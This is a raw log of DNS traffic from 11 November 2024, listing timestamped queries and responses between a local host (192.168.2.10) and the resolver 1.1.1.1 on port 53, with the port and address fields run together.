                                                                                                                                                                                                            Nov 11, 2024 18:25:17.385045052 CET53615461.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.385720015 CET53530011.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386229038 CET53507981.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386240959 CET53537391.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386251926 CET53539201.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386354923 CET53630151.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386470079 CET53612821.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386482000 CET53506621.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386957884 CET53622721.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.387304068 CET53628521.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.388591051 CET53513281.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.398844004 CET53598611.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.404329062 CET53592251.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.404455900 CET53635421.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.404500008 CET53514951.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.405039072 CET53506851.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.405344963 CET53519361.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.405987978 CET53546161.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.406893969 CET53525161.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.406940937 CET53654011.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.407188892 CET53560041.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.407538891 CET53609451.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.407551050 CET53537211.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.407603025 CET53530741.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.410672903 CET53492761.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.509727955 CET53500401.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.566497087 CET53561451.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.970642090 CET5651253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.033559084 CET4943353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.300226927 CET53565121.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.349920034 CET53494331.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.179130077 CET6375553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.179676056 CET5716753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.180771112 CET4979753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.182063103 CET6252053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.187695980 CET5709653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.188281059 CET53571671.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.193126917 CET53497971.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.198086977 CET53570961.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.201502085 CET6194253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.210520029 CET6476653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.211657047 CET53637551.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.212246895 CET53619421.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.213138103 CET53625201.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.215521097 CET5170053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.216233969 CET5390453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.216943026 CET5142653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.217684031 CET5722453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.218456984 CET5887353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.219336987 CET5973753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.219651937 CET5307453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.220315933 CET5037153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.220419884 CET53647661.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.220988989 CET5118153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.221841097 CET6323553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.222426891 CET5672753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.223148108 CET5872753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.223961115 CET6296853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.225723982 CET53514261.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.228092909 CET53517001.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.228413105 CET53572241.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.231669903 CET53511811.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.231841087 CET53632351.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.232777119 CET53629681.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.240113020 CET5501953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.249005079 CET5018353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.249682903 CET53539041.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.249747038 CET53588731.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.249869108 CET53597371.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.249927998 CET53550191.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.251202106 CET53530741.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.251723051 CET53503711.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.253395081 CET53567271.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.255640984 CET53587271.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.258133888 CET53501831.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.258826971 CET5618553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.259371042 CET5156853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.259582996 CET5298253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.260139942 CET6018153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.260256052 CET5918753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.260371923 CET6282453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.260518074 CET5019553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.260812044 CET6358553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.261020899 CET6219753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.262558937 CET5724153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.266592979 CET53561851.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.266875029 CET53529821.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.269107103 CET53515681.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.269627094 CET53591871.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.269638062 CET53601811.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.270214081 CET53621971.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.270495892 CET53628241.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.270896912 CET53635851.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.271589041 CET5626553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.272093058 CET5414253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.272428989 CET6130553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.272598982 CET6365553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.272870064 CET53572411.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.273502111 CET6037953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.274430037 CET5412353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.274610996 CET6158153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.276597977 CET5504453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.277184010 CET6472353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.277668953 CET5897553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.282074928 CET53636551.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.282438993 CET53541421.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.283703089 CET5349853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.283983946 CET5973453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.284025908 CET5406253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.284126997 CET53615811.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.284349918 CET6182853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.284363985 CET5973553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.284558058 CET5678753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.284663916 CET5947953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.284872055 CET6491353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.285029888 CET6452953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.285089016 CET53541231.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.285442114 CET5985953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.287005901 CET53647231.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.287086010 CET5081853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.287775040 CET6435053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.289813995 CET6512353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.289877892 CET5091153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.290936947 CET6386853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.291100979 CET6107153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.291563034 CET53501951.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.292505980 CET53534981.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.293070078 CET53540621.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.293638945 CET53597351.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.293879986 CET53567871.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.294780016 CET53643501.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.294873953 CET53649131.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.296175957 CET53589751.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.296725035 CET5840753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.296737909 CET53509111.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.298563004 CET5523853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.298896074 CET5989053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.299371004 CET5919053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.299495935 CET6030953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.299549103 CET4980953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.300398111 CET53651231.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.303478956 CET53613051.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.303493023 CET53562651.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.304202080 CET53603791.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.306562901 CET53584071.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.307524920 CET53550441.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.308890104 CET53552381.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.309305906 CET53498091.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.309659958 CET53603091.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.315023899 CET53594791.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.315171957 CET53597341.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.316783905 CET53645291.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.317318916 CET53598591.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.317827940 CET53618281.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.318344116 CET53591901.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.318579912 CET53508181.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.321132898 CET53638681.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.322340965 CET53610711.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.331291914 CET53598901.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.792053938 CET5193553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.793081999 CET4928553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.793442011 CET6191453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.794318914 CET5949753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.797736883 CET5065053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.803006887 CET6170353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.803086042 CET53492851.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.804059982 CET53619141.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.808228970 CET53506501.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.813280106 CET6247053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.813600063 CET5326653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.823360920 CET53532661.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.823415995 CET5600953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.824935913 CET5547653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.826235056 CET53519351.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.830894947 CET53624701.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.835359097 CET53554761.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.840424061 CET6364253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.846743107 CET6471253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.849617004 CET53636421.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.849678993 CET5466253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.851804972 CET5332453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.852739096 CET6367253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.853419065 CET5345153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.854592085 CET5463453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.855174065 CET53560091.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.856432915 CET5335753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.857920885 CET53594971.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.858774900 CET5871753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.859272957 CET53546621.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.860065937 CET53636721.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.860507965 CET6518653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.861140013 CET53533241.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.861546040 CET5381153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.862392902 CET6110053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.862767935 CET5416753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.864685059 CET53546341.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.865613937 CET5413353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.866884947 CET53533571.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.868424892 CET53587171.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.869327068 CET53538111.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.871582031 CET53651861.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.871843100 CET53611001.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.871901989 CET5693253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.873780966 CET6506053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.875761032 CET53541331.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.875806093 CET6530853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876085997 CET5536753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876085997 CET5615453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876283884 CET5704053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876317978 CET6156853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876497984 CET5552353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876660109 CET5832153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876878023 CET6258353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.877620935 CET53647121.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.878551006 CET6428053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.878958941 CET5883353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.881028891 CET5003253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.881285906 CET5594253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.881808996 CET53569321.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.884151936 CET53625831.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.885544062 CET53534511.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.885858059 CET53583211.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.885948896 CET53615681.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.885960102 CET53561541.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.886076927 CET53653081.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.886460066 CET53570401.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.886589050 CET53555231.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.888823986 CET53588331.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.890717030 CET53500321.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.891196012 CET53559421.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.893877983 CET53541671.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.905029058 CET53650601.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.907041073 CET5381553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.907430887 CET6320653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.908323050 CET5010953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.908945084 CET5930153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909178972 CET5052853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909359932 CET5849253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909426928 CET53642801.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909555912 CET5474953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909740925 CET5312453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909974098 CET53553671.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.910634041 CET5051853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.910695076 CET5240653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.910861969 CET6162053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911036968 CET5143153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911215067 CET5603253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911236048 CET5361053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911422014 CET6396953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911602020 CET5887753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911675930 CET5119653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911783934 CET5606153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911947966 CET5021153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.912220955 CET6484653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.915432930 CET6214853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.915646076 CET6516453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.916419983 CET53547491.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.916420937 CET5894353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.916440964 CET53632061.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.916616917 CET5844253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.917372942 CET6056053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.917570114 CET5774253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.918410063 CET53501091.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.918992996 CET53593011.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.920689106 CET53639691.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.920825005 CET53524061.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.921278000 CET53502111.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.921406031 CET53531241.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.921603918 CET53560321.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.921768904 CET53514311.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.921966076 CET53648461.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.922508955 CET53588771.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.922758102 CET53651641.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.925961018 CET53589431.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.926203966 CET53621481.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.940116882 CET53505281.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.940342903 CET53538151.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.940591097 CET53584921.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.941350937 CET53536101.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.941497087 CET53616201.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.941538095 CET53505181.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.942394972 CET53560611.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.942406893 CET53511961.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.948184013 CET53577421.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.948601961 CET53584421.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.949304104 CET53605601.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.017560005 CET53617031.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.131535053 CET4996253192.168.2.101.1.1.1
